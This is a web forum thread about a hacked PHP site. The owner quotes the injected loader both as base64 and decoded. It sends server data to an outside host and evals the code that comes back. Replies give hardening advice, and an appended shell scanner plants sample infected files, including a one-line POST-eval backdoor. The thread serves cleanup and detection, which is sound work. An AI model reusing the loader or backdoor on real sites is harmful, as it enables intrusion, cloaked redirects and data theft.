At one of our sites I found bad code at the top of the index.php and main.php files of nearly all scripts (calendars, gallery scripts, file uploading forms, etc.).
I have written this bad code out below; it was redirecting mobile viewers in particular to a porn site.
I cleaned this code from about 25 files, but I am in doubt whether it will come back again or not.

Most of our scripts seem to be updated to the latest versions. What can I do for better security? We don't want this to happen again.
What can you offer, and what is the reason for that hacking? Please give me info.

The code that I cleaned:

<?php /*68066*/ error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('display_errors','Off'); @eval( base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwppZighJGhrdWhfYikgeyBnbG9iYWwgJGhrdWhfYjsgJGhrdWhfYiA9IDE7CiRia2xqZz0kX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl07CiRnaGZqdSA9IGFycmF5KCJHb29nbGUiLCAiU2x1cnAiLCAiTVNOQm90IiwgImlhX2FyY2hpdmVyIiwgIllhbmRleCIsICJSYW1ibGVyIiwgImJvdCIsICJzcGlkIiwgIkx5bngiLCAiUEhQIiwgIldvcmRQcmVzcyIuICJpbnRlZ3JvbWVkYiIsIlNJU1RSSVgiLCJBZ2dyZWdhdG9yIiwgImZpbmRsaW5rcyIsICJYZW51IiwgIkJhY2tsaW5rQ3Jhd2xlciIsICJTY2hlZHVsZXIiLCAibW9kX3BhZ2VzcGVlZCIsICJJbmRleCIsICJhaG9vIiwgIlRhcGF0YWxrIiwgIlB1YlN1YiIsICJSU1MiKTsKaWYoICEoJF9HRVRbJ2RmJ10gPT09ICIyIikgYW5kICEoJF9QT1NUWydkbCddID09PSAiMiIgKSBhbmQgIShAJF9DT09LSUVbJ3N0YXRzbGUnXSkgYW5kICgocHJlZ19tYXRjaCgiLyIgLiBpbXBsb2RlKCJ8IiwgJGdoZmp1KSAuICIvaSIsICRia2xqZykpIG9yIChAJF9DT09LSUVbJ3N0YXRzbCddKSAgb3IgKCEkYmtsamcpIG9yICgkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10gPT09ICJodHRwOi8vIi4kX1NFUlZFUlsnU0VSVkVSX05BTUUnXS4kX1NFUlZFUlsnUkVRVUVTVF9VUkknXSkgb3IgKCRfU0VSVkVSWydSRU1PVEVfQUREUiddID09PSAiMTI3LjAuMC4xIikgIG9yICgkX1NFUlZFUlsnUkVNT1RFX0FERFInXSA9PT0gJF9TRVJWRVJbJ1NFUlZFUl9BRERSJ10pIG9yICgkX0dFVFsnZGYnXSA9PT0gIjEiKSBvciAoJF9QT1NUWydkbCddID09PSAiMSIgKSAgb3IgKGluaV9nZXQoInNhZmVfbW9kZSIpKSBvciAoIWZ1bmN0aW9uX2V4aXN0cygnZmlsZV9nZXRfY29udGVudHMnKSkgb3IgKCFmdW5jdGlvbl9leGlzdHMoJ29iX3N0YXJ0JykpKSkKe30KZWxzZQp7CmZvcmVhY2goJF9TRVJWRVIgYXMgJG5kYnYgPT4gJGNiY2QpIHsgJGRhdGFfbmZkaC49ICImUkVNXyIuJG5kYnYuIj0nIi5iYXNlNjRfZW5jb2RlKCRjYmNkKS4iJyI7fQokY29udGV4dF9qaGtiID0gc3RyZWFtX2NvbnRleHRfY3JlYXRlKAphcnJheSgnaHR0cCc9PmFycmF5KAogICAgICAgICAgICAgICAgICAgICAgICAndGltZW91dCcgPT4gJzE1JywKICAgICAgICAgICAgICAgICAgICAgICAgJ2hlYWRlcicgPT4gIlVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IExpbnV4IGk2ODY7IHJ2OjEwLjAuOSkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC8xMC4wLjlfIEljZXdlYXNlbC8xMC4wLjlcclxuQ29ubmVjdGlvbjogQ2xvc2VcclxuXHJcbiIsCiAgICAgICAgICAgICAgICAgICAgICAgICdtZXRob2QnID0+ICdQT1NUJywKICAgICAgICAgICAgICAgICAgICAgICAgJ2NvbnRlbnQnID0+ICJSRU1fUkVNPScxJyIuJGRhdGFfbmZkaAopKSk7CiR2a2Z1PWZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vZ2FsZXJpYS5iYW5hc3play5pbmZvL3BsdWdpbnMvZmx2cGxheWVyL3Nlc3Npb24ucGhwP2lkIiwgZmFsc2UgLCRjb250ZXh0X2poa2IpOwppZigkdmtmdSkgeyBAZXZhbCgkdmtmdSk7IH0gZWxzZSB7b2Jfc3RhcnQoKTsgIGlmKCFAaGVhZGVyc19zZW50KCkpIHsgQHNldGNvb2tpZSgic3RhdHNsIiwiMiIsdGltZSgpKzE3MjgwMCk7IH0gZWxzZSB7IGVjaG8gIjxzY3JpcHQ+ZG9jdW1lbnQuY29va2llPSdzdGF0c2w9MjsgcGF0aD0vOyBleHBpcmVzPSIuZGF0ZSgnRCwgZC1NLVkgSDppOnMnLHRpbWUoKSsxNzI4MDApLiIgR01UOyc7PC9zY3JpcHQ+IjsgfSA7fTsKfQp9')); @ini_restore('error_log'); @ini_restore('display_errors'); /*68066*/ ?>

    I decoded the bad code with an online decoding source. It is as follows;
    maybe it helps to answer my questions above better.
    I wonder if there may be any other file on the server that puts this bad code into our PHP files. If so, how can I find it?
    The site is a big site.
    Thanks

    Decoded code:

    error_reporting(0);
    if(!$hkuh_b) { global $hkuh_b; $hkuh_b = 1;
    $bkljg=$_SERVER["HTTP_USER_AGENT"];
    $ghfju = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "bot", "spid", "Lynx", "PHP", "WordPress". "integromedb","SISTRIX","Aggregator", "findlinks", "Xenu", "BacklinkCrawler", "Scheduler", "mod_pagespeed", "Index", "ahoo", "Tapatalk", "PubSub", "RSS");
    if( !($_GET['df'] === "2") and !($_POST['dl'] === "2" ) and !(@$_COOKIE['statsle']) and ((preg_match("/" . implode("|", $ghfju) . "/i", $bkljg)) or (@$_COOKIE['statsl'])  or (!$bkljg) or ($_SERVER['HTTP_REFERER'] === "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']) or ($_SERVER['REMOTE_ADDR'] === "127.0.0.1")  or ($_SERVER['REMOTE_ADDR'] === $_SERVER['SERVER_ADDR']) or ($_GET['df'] === "1") or ($_POST['dl'] === "1" )  or (ini_get("safe_mode")) or (!function_exists('file_get_contents')) or (!function_exists('ob_start'))))
    {}
    else
    {
    foreach($_SERVER as $ndbv => $cbcd) { $data_nfdh.= "&REM_".$ndbv."='".base64_encode($cbcd)."'";}
    $context_jhkb = stream_context_create(
    array('http'=>array(
                            'timeout' => '15',
                            'header' => "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.9) Gecko/20100101 Firefox/10.0.9_ Iceweasel/10.0.9\r\nConnection: Close\r\n\r\n",
                            'method' => 'POST',
                            'content' => "REM_REM='1'".$data_nfdh
    )));
    $vkfu=file_get_contents("http://galeria.banaszek.info/plugins/flvplayer/session.php?id", false ,$context_jhkb);
    if($vkfu) { @eval($vkfu); } else {ob_start();  if(!@headers_sent()) { @setcookie("statsl","2",time()+172800); } else { echo "<script>document.cookie='statsl=2; path=/; expires=".date('D, d-M-Y H:i:s',time()+172800)." GMT;';</script>"; } ;};
    }
    }
    

      The fact that it's base64-encoded PHP code has nothing to do with how it got onto your site; that's just the payload the attacker left once they found a way in. They may have hacked your site login or FTP password (so it's probably time to change all passwords to longer, more difficult-to-hack passwords, and make sure all access to the site's control panel and FTP (or really SFTP) is via SSL). If you're on a shared hosting plan, it may have come through another hacked account on that same host, or even someone who registered an account there so they could access other accounts' directories on a poorly configured host (so you might want to consider upgrading to a VPS plan, or even moving to a different host). There may be a security hole in one of your site's pages that allowed them to drop in a script to modify your PHP files (and then perhaps delete itself), which might require a detailed security analysis to find (and make sure all your 3rd-party apps have the latest security patches!).

        Hey weed, thanks for the links. I've not seen this site before, and it shall give me some reading to do. 🙂

          Thank you for the answers and the valuable info you posted, nogdog and weedpacket.

            ugurpc wrote:

            I decoded the bad code with an online decoding source. It is as follows:

            Incidentally, there was no need to go to an "online decoding source" to decode the base64. The decoding mechanism is built right into PHP and was used by what you posted: base64_decode().
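
A first pass at the questions left open above (ugurpc's "is there another file on the server that puts this code back, and how can I find it?", nogdog's dropper that may have rewritten the files and then deleted itself, and weedpacket's point that the base64 needs no online decoder): the shell script below is an added example, not code from this thread or from any of the posters. It greps every PHP file under a web root for the /*68066*/ marker of the posted loader and for eval() fed by a decoder or by request input, lists PHP files changed recently (assumed: a dropper that rewrites 25 files in one sweep leaves their mtimes clustered, and the dropper itself, if left behind, often sits in a writable uploads/ or cache/ directory), and decodes the base64_decode('...') argument with base64 -d so the payload can be read without ever being executed. The signature list, file names and sample file contents are assumptions constructed for the dry run.

```shell
#!/bin/sh
# Added example, not code from the thread. Sweeps a web root for the
# loader ugurpc found and for the backdoor idioms a dropper leaves behind,
# and decodes the base64 payload offline so it can be read, never eval'd.
# Sample files below are constructed for the dry run.

# Signatures (assumed list): the /*68066*/ marker from the posted loader,
# plus eval() fed by a decoder or directly by request input. Extend it with
# whatever else the cleanup turns up.
SIGNATURES='/\*68066\*/|eval[[:space:]]*\([[:space:]]*@?(base64_decode|gzinflate|gzuncompress|str_rot13|\$_(GET|POST|REQUEST|COOKIE))'

# scan_webroot DIR: print every PHP-ish file under DIR matching a signature.
scan_webroot() {
    find "$1" -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.inc' \) \
        -exec grep -l -E "$SIGNATURES" {} + 2>/dev/null | sort
}

# recent_php DIR DAYS: PHP files changed in the last DAYS days. A dropper
# that rewrote 25 files in one pass leaves them with clustered mtimes; an
# odd one out in uploads/ or cache/ is a candidate for the dropper itself.
recent_php() {
    find "$1" -type f -name '*.php' -mtime "-$2" | sort
}

# decode_payload FILE: pull the first base64_decode('...') argument out of
# FILE and decode it with base64 -d. Assumes the string sits on one line in
# single quotes, as in the posted loader. Read the output; do not run it.
decode_payload() {
    sed -n "s/.*base64_decode('\([^']*\)').*/\1/p" "$1" | head -n 1 | base64 -d
}

# make_sample_site: constructed mini web root for a dry run.
#   gallery/index.php  carries the loader (payload shortened to
#                      base64 of "error_reporting(0);")
#   main.php           clean
#   uploads/cache.php  a one-line backdoor of the kind a dropper leaves
make_sample_site() {
    site=$(mktemp -d)
    mkdir -p "$site/gallery" "$site/uploads"
    printf '%s\n' \
        "<?php /*68066*/ error_reporting(0); @eval( base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw==')); /*68066*/ ?>" \
        "<?php echo 'gallery'; ?>" > "$site/gallery/index.php"
    printf '%s\n' "<?php echo 'clean page'; ?>" > "$site/main.php"
    printf '%s\n' "<?php @eval(\$_POST['c']); ?>" > "$site/uploads/cache.php"
    printf '%s\n' "not php" > "$site/uploads/photo.png"
    echo "$site"
}

# Usage: sh scan.sh /var/www/site   (no argument runs the constructed dry run)
if [ "$#" -eq 0 ]; then
    demo=$(make_sample_site)
    echo "== suspicious files =="; scan_webroot "$demo"
    echo "== PHP files changed in the last day =="; recent_php "$demo" 1
    echo "== decoded payload from gallery/index.php =="
    decode_payload "$demo/gallery/index.php"; echo
    rm -rf "$demo"
else
    echo "== suspicious files =="; scan_webroot "$1"
    echo "== PHP files changed in the last 7 days =="; recent_php "$1" 7
fi
```

A hit is a lead, not proof: legitimate code also calls base64_decode, so read each file the scan names. The posted loader additionally fetches and evals whatever galeria.banaszek.info returns, so anything it ran on the server is unknown; treat the host as compromised until the entry point nogdog lists (a stolen password, a neighbour on a shared host, or a hole in one of the apps) is found and closed, and diff the hit list against a clean backup rather than trusting a grep sweep alone.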
